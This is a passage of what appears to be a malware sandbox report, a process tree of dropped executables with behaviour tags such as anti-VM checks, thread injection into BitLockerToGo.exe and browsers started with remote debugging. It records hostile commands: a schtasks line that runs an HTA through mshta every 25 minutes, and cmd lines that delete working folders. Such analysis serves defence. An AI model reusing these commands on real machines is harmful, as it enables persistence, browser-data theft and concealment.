        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5324
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2300 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5000
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1984,7159157880828132727,7501426540574747883,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:8
        6⤵
        
        PID:3016
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\qqi5x" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5712
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:1392
  - - C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe
      "C:\Users\Admin\AppData\Local\Temp\1084873001\7aencsM.exe"
      4⤵
      Executes dropped EXE
      Checks processor information in registry
      PID:5508
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1408 -s 992
      4⤵
      Program crash
      PID:2856
- - C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe
    "C:\Users\Admin\AppData\Local\Temp\1087058001\dzvh4HC.exe"
    3⤵
    - Executes dropped EXE
    PID:5588
- - C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
    "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1952
- - C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe
    "C:\Users\Admin\AppData\Local\Temp\1089465001\lwtLxxH.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe
    "C:\Users\Admin\AppData\Local\Temp\1090306001\7nSTXG6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:1716
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      PID:5268
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        
        PID:5488
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff926f0cc40,0x7ff926f0cc4c,0x7ff926f0cc58
        6⤵
        
        PID:3776
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=1892 /prefetch:2
        6⤵
        
        PID:1552
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1736,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2080 /prefetch:3
        6⤵
        
        PID:1368
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2144,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=2160 /prefetch:8
        6⤵
        
        PID:1096
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3180 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4980
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3188,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=3224 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3884
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4532 /prefetch:8
        6⤵
        
        PID:1404
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4404 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4584
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4476,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4800 /prefetch:8
        6⤵
        
        PID:4780
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4824 /prefetch:8
        6⤵
        
        PID:4596
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5108 /prefetch:8
        6⤵
        
        PID:1408
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4784,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5248 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:484
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5264,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4200 /prefetch:8
        6⤵
        
        PID:5812
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=5024 /prefetch:8
        6⤵
        
        PID:2332
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5128,i,15940079810374579585,6821074978999083094,262144 --variations-seed-version=20250220-180107.507000 --mojo-platform-channel-handle=4836 /prefetch:8
        6⤵
        
        PID:3456
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:2268
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff926f13cb8,0x7ff926f13cc8,0x7ff926f13cd8
        6⤵
        
        PID:3016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1968 /prefetch:2
        6⤵
        
        PID:1316
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:3
        6⤵
        
        PID:2672
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
        6⤵
        
        PID:4348
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:6056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:2
        6⤵
        
        PID:2948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2756 /prefetch:2
        6⤵
        
        PID:3384
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2184 /prefetch:2
        6⤵
        
        PID:5680
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5680 -s 288
        7⤵
        
        PID:3116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2176 /prefetch:2
        6⤵
        
        PID:3056
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,1030233575548922440,4599842013243702598,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2492 /prefetch:2
        6⤵
        
        PID:5168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6036
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9302c3cb8,0x7ff9302c3cc8,0x7ff9302c3cd8
        6⤵
        
        PID:4844
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
        6⤵
        
        PID:1560
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1560 -s 288
        7⤵
        
        PID:4780
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
        6⤵
        
        PID:2392
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2820 /prefetch:8
        6⤵
        
        PID:5948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5232
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5988
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1888 /prefetch:2
        6⤵
        
        PID:5272
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2228 /prefetch:2
        6⤵
        
        PID:2044
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3988 /prefetch:2
        6⤵
        
        PID:6220
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4820 /prefetch:2
        6⤵
        
        PID:6304
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2316 /prefetch:2
        6⤵
        
        PID:6380
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4308 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4760
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1884,10032117800563810607,5979053062874829386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4328 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3128
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\sjmgv" & exit
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:7088
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        6⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:660
- - C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe
    "C:\Users\Admin\AppData\Local\Temp\1090366101\c9aa4cecce.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3172
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4128
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn wnekpmaqpoN /tr "mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3776
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\LeHKtr9rh.hta
      4⤵
      PID:4432
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
